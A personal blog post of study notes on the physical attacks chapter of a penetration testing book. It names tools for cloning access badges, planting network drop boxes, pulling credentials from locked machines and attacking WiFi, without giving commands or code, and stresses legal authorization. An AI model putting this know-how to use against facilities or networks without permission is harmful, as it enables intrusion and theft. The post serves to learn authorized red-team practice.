Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.
Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it.
THP3 06 – The Onside Kick – Physical Attacks
Onto physical security…the area where you are subjecting yourself to physical harm. There are some fantastic stories out there about pentesting physical security. Fantastic, scary, and a good reminder that perhaps physical pentests of facilities with certain levels of security shouldn’t be done. But an interesting chapter. Mr. Robot has a few episodes that show exploiting physical security, and Sneakers had some classic scenes. Physical attacks carry a lot of risks, so be extra careful. A lot of cons have lockpick villages, but just having lockpicks is illegal in some places. So familiarize yourself with local laws. Make sure you’ve got your get out of jail free letter, etc. Since I won’t be running out and picking up all of these tools, this will be a pretty quick write-up.
Card Reader Cloners
Lots of coverage of this in THP2, so I look forward to that when I work through that book. Some badges are vulnerable. ProxCard II badges are specifically mentioned as easy to clone using a Proxmark3 or the more portable Proxmark3 RDV2. I’m not sure whether to be excited or frightened that you can pick up the RDV2, accessory kit, and a 10 pack of cards for less than $500 from Hacker Warehouse. Kim gives a reference to Kevin Chung’s blog post on RFID hacking.
Physical Tools to Bypass Access Points
The LAN Turtle is a drop box option. It seems pretty straightforward to get set up. Kim walks through a complete setup. Something to come back do when I get either a LAN Turtle or a Raspberry Pi to use as a drop box. Kim included additional tips like adding a cron job and setting up separate VPN servers and MAC addresses for each LAN Turtle if you will be using multiple. You may wan to look for alternatives to cron jobs as well if you are targeting a Linux systems. This Braking Down Security has a discussion on systemd and the possibility of using .timer files. Something to keep an eye on at least because cron jobs are sometimes an exploitable vector.
The Packet Squirrel can be used to get connections out and capture traffic. Kim lists several resources to let you use the Packet Squirrel more effectively.
- SWORD dropbox write-up
- Accessing internal networks with reverse VPN connections
- Installing a OpenVPN access server on Ubuntu 15.10
- Setting up a transparent VPN internet gateway
The Rubber Ducky has been covered in previous books. A Bash Bunny is an advanced option. Kim also mentions the KonBoot. Basically there’s a lot of cool stuff out there that you can use or make to conduct physical testing. The Bash Bunny can use QuickCreds or BunnyTap. BunnyTap is based on PoisonTap, which pulls a ton of info from even locked machines. There are also other payloads available.
WiFi attacks have remained fairly stable. WEP is less common, but still used. Wifite2 is Kim’s preferred tool. It works well based on my experiences with it. The most finicky part is often getting your WiFi adapter setup. Kim like the Alfa AWUS036NHA. I’ve got a Panda Wireless PAU05 that I like because of the small form factor. I’ve also got a TP-Link TL-WN722N. The TP-Link version has been popular in the past, but the newer versions (2.0 and 3.0) aren’t initially setup to run in monitor mode. There are a lot of suggestions out there on how to fix this, but I’ve run into issues with the V3.0 I have. The takeaway is carefully look at the adapter you decide to get to make sure it will do what you need to do. I’m happy with the Panda I have and have known others who have had good luck with the Alfa and other Panda models. The Wifi Pineapple Nano is a step up for more advanced attacks. There’s also eaphammer that can to a lot against WPA2-Enterprise networks.
Physical attacks are both fun and risky. From a red team perspective, the key is looking for weak spots in physical security and how people respond to potential physical breaches. And another reminder to make sure you’ve got everything clearly spelled out and have your get out of jail info ready to go.
It’s amazing and somewhat disturbing how affordably you can load up on physical pentesting gear. It’s not cheap, but getting geared up to do physical pentesting would not be cost prohibitive in starting a consulting company. I don’t know that physical pentests are something that I’ll be doing in the near future, but it would be fun. I may look into repurposing some devices I have to test some of these attacks.
- Make a conscious effort to observer physical security and think about how to test it
- Check out the lockpick village at a con